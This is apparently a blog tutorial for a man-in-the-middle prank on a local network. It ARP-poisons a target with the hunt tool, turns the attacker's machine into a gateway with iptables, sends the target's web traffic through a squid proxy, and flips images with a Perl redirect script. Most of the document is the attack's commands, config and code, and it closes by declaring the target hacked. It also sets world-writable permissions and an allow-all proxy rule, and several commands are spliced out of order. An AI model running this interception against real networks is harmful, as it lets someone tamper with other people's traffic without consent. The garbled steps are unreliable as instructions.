This is what we want to do:
- Make the target send all http packet to us instead of the gateway
- Forward them to the real gateway
- Modify the replay, with the pictures upside-down
- Forward the replay to the target
- Poison the ARP table of the target
- Set up our pc as a gateway router
- Send all http requests through a squid proxy
- Turn images upside-down with a squid script
Ok, sound great, lets get started!
1. Poison the ARP table of the target
We want the target to send all packets to us instead of the real gateway. To do this we need to know a little about ip addresses and mac addresses. When we wan to send a packet to 10.0.0.1, there is sent out an ARP request on the local lan, saying “Which computer is at 10.0.0.1?”, then 10.0.0.1 answers with an ARP repay “I am at 10.0.0.1, with mac address 11:22:33:44:55:66″.
Then we send the packet to 11:22:33:44:55:66. ARP replays are cached in a local ARP table, so the next time we want to send to 10.0.0.1, we don’t need to ask who’s got it. We are going to send a fake ARP replay to the target (10.0.0.88), saying we are at 10.0.0.1. Usually ARP replays are accepted even though no request was sent, so this is actually really easy.
How do I do this?
We can use arpoison to construct a fake packet and send it, but i prefer to use another a bit mor powerful script, called hunt. You can download the hunt source code here, and compile like this:
tar zxvf hunt-1.5.tgz
cd hunt-1.5
make
Fire up hunt:
sudo ./huntIn the menu system go to
a) daemons rst/arp/sniff/macType in the ip of the real gateway, your mac address (find this by running ifconfig), and the targets ip. Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing “arp -a” on the target, and see that the gateway ip has your mac address.
b) arp spoof + arp relayer daemon
c) insert single/range arp spoof
d) start/stop relayer daemon (press s)
2. Set up our pc as a gateway router
This is easy, just do this commands:
sudo iptables -FWhere eth0 is your network interface connected to the lan. The changes are reset the next time the network is reloaded.
sudo iptables -F -t nat
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
3. Send all http requests through a squid proxy
Install squid and reset it’s config:
sudo apt-get squidEdit /etc/squid/squid.conf with your favorite editor like this:
sudo mv /etc/squid/squid.conf /etc/squid/squid.conf.default
http_port 127.0.0.1:8080
http_port 10.0.0.2:8080
visible_hostname gateway.my.flat
cache_mgr proxy@foo.com
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
acl all src 0.0.0.0/0.0.0.0
http_access allow all
redirect_program /var/redirect
4. Turn images upside-down with a squid script
We use the redirect program defined in the squid config to flip our images, edit /var/redirect to look like this:
As you can see from the script, we need to serve the flipped images from a local webserver. Therefore, install apache:
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while (<>) {
chomp $_;
if ($_ =~ /(.*\.jpg)/i) {
$url = $1;
system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/$pid-$count.jpg”, “$url”);
system(”/usr/bin/mogrify”, “-flip”,”/var/www/$pid-$count.jpg”);
system(”/bin/chmod”, “777″, “/var/www/$pid-$count.jpg”);
print “http://127.0.0.1/$pid-$count.jpg\n”;
}
elsif ($_ =~ /(.*\.gif)/i) {
$url = $1;
system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/$pid-$count.gif”, “$url”);
system(”/usr/bin/mogrify”, “-flip”,”/var/www/$pid-$count.gif”);
system(”/bin/chmod”, “777″, “/var/www/$pid-$count.gif”);
print “http://127.0.0.1/$pid-$count.gif\n”;}
else {
print “$_\n”;;
}
$count++;
}
sudo apt-get install apache2At last, reload squid with the new configuration:
sudo chmod -R 777 /var/www
sudo /etc/init.d/squid restartYou can test the squid by configuring your firefox to use localhost:8080 as a proxy server.
YOU HAVE NOW HACKED THE TARGET COMPUTER!
Thanks....
0 comments:
Post a Comment